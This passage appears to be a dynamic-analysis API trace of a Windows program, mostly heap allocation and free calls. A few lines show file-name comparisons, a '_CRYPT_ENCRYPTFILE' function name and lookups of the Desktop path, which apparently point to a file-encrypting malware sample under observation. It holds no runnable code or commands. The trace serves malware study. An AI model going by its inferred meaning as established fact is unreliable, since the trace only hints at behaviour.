dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0184.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0184.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0184.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0184.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0184.982] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0184.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0184.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0184.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0184.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0184.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0184.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i48aq9pLiKOVw_egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0184.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="48aq9pLiKOVw_egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8aq9pLiKOVw_egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aq9pLiKOVw_egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q9pLiKOVw_egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9pLiKOVw_egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pLiKOVw_egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LiKOVw_egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iKOVw_egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KOVw_egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OVw_egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vw_egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w_egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="egcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gcT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cT3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0184.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T3.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0184.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0184.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0184.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0184.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0184.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0184.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0184.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0184.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0184.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0184.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0184.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0184.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0184.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0184.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0184.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0184.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0184.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0184.984] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0184.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0184.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0184.984] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0184.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0184.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0184.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0184.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0184.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0184.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0184.984] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0184.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0184.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0184.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0184.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0184.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0184.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0184.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0184.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0184.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0184.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0184.985] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0184.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0184.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0184.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0184.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0184.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0184.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0184.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0184.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0184.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53890 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0184.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0184.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0184.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0184.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0184.987] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0184.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0184.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0184.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0184.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0184.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0184.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0184.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0184.988] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0184.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0184.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0184.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0184.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0184.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0184.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0184.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0184.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0184.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0184.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0184.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0184.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0184.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0184.989] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0184.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0184.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0184.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0184.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0184.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0184.989] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0184.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0184.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0184.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0184.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0184.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0184.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0184.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0184.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0184.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0184.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0184.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0184.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0184.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0184.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0184.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0184.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0184.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 